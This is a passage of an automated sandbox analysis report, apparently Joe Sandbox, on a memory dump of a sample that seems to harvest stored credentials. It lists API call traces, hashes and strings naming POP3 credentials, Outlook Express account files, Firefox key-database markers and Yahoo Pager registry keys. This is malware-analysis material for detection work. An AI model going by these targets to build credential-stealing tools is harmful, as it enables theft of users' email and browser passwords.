                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                    • API String ID: 524865279-2190619648
                                                                                                    • Opcode ID: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                                                                    • Opcode Fuzzy Hash: 55a0e755ce337ed8ec2c6c07cedd39ffb5fc25da41f12a4c1638fbb6ad82bb7f
                                                                                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                    • Opcode ID: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                    • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                                                                    • Opcode Fuzzy Hash: 907528759bbb18dce9457df7181d62465921ebddfaa0382ced0e89f5b2f7be62
                                                                                                    • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _mbscat$memsetsprintf
                                                                                                    • String ID: %2.2X
                                                                                                    • API String ID: 125969286-791839006
                                                                                                    • Opcode ID: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                    • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                                                                                    • Opcode Fuzzy Hash: 9c19aaf7f677ea7ecaaa68fd645f93e77cedd0abf8e0cf5d26ccbe431d4a3f96
                                                                                                    • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                      • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                    • String ID: ACD
                                                                                                    • API String ID: 1886237854-620537770
                                                                                                    • Opcode ID: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                                                                                    • Opcode Fuzzy Hash: 71777aa9ede06244d1de1e18fc34779f764221ff73557442bd1fb5a77d860cc9
                                                                                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004091EC
                                                                                                    • sprintf.MSVCRT ref: 00409201
                                                                                                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                      • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                    • String ID: caption$dialog_%d
                                                                                                    • API String ID: 2923679083-4161923789
                                                                                                    • Opcode ID: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                                                                    • Opcode Fuzzy Hash: b98d7882fd77985c372b0eebd508907c84f5dd2114f9663256285184f95d0829
                                                                                                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                                                                    APIs
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                    • memset.MSVCRT ref: 00410246
                                                                                                    • memset.MSVCRT ref: 00410258
                                                                                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                    • memset.MSVCRT ref: 0041033F
                                                                                                    • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                    • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 3974772901-0
                                                                                                    • Opcode ID: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                    • Instruction ID: 1856ef5d95eaf0ecdca85a0e0a2b389725ab0ec505974788b48c76207b2fc2b2
                                                                                                    • Opcode Fuzzy Hash: e03ed6fdc283bc3af613453c6835362d657ea6da5c5ed20180b537596a2fd916
                                                                                                    • Instruction Fuzzy Hash: FF510D7190021CABDB11DF95DD85ADEBBB8EB48305F1001AAEA19E3241D7759FC0CF69
                                                                                                    APIs
                                                                                                    • wcslen.MSVCRT ref: 0044406C
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                      • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                    • strlen.MSVCRT ref: 004440D1
                                                                                                      • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                      • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                    • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                    • String ID:
                                                                                                    • API String ID: 577244452-0
                                                                                                    • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                    • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                                                                    • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                                                                    • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                      • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                    • _strcmpi.MSVCRT ref: 00404518
                                                                                                    • _strcmpi.MSVCRT ref: 00404536
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _strcmpi$memcpystrlen
                                                                                                    • String ID: imap$pop3$smtp
                                                                                                    • API String ID: 2025310588-821077329
                                                                                                    • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                    • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                                                                    • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                                                                    • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040C02D
                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76230A60), ref: 00408EBE
                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408E31
                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                      • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                      • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                      • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                      • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                      • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                    • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                    • API String ID: 2726666094-3614832568
                                                                                                    • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                    • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                    • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                    • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                    APIs
                                                                                                    • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                    • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                    • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                    • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                    • String ID:
                                                                                                    • API String ID: 2014771361-0
                                                                                                    • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                    • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                    • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                    • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                    APIs
                                                                                                    • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                      • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                      • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                    • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                    • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                    • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcmp$memcpy
                                                                                                    • String ID: global-salt$password-check
                                                                                                    • API String ID: 231171946-3927197501
                                                                                                    • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                    • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                    • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                    • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                    APIs
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??3@
                                                                                                    • String ID:
                                                                                                    • API String ID: 613200358-0
                                                                                                    • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                    • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                    • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                    • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040644F
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                      • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                      • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                    • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                    • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                      • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 438689982-0
                                                                                                    • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                    • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                    • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                    • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                    • memset.MSVCRT ref: 0040330B
                                                                                                    • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                    • strchr.MSVCRT ref: 0040335A
                                                                                                      • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                    • strlen.MSVCRT ref: 0040339C
                                                                                                      • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                    • String ID: Personalities
                                                                                                    • API String ID: 2103853322-4287407858
                                                                                                    • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                    • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                    • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                    • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00444573
                                                                                                      • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValuememset
                                                                                                    • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                    • API String ID: 1830152886-1703613266
                                                                                                    • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                    • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                    • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                    • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000D.00000002.2670188898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 0000000D.00000002.2670188898.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 0000000D.00000002.2670188898.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_13_2_400000_Suzhou Alpine Flow Control Co.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset
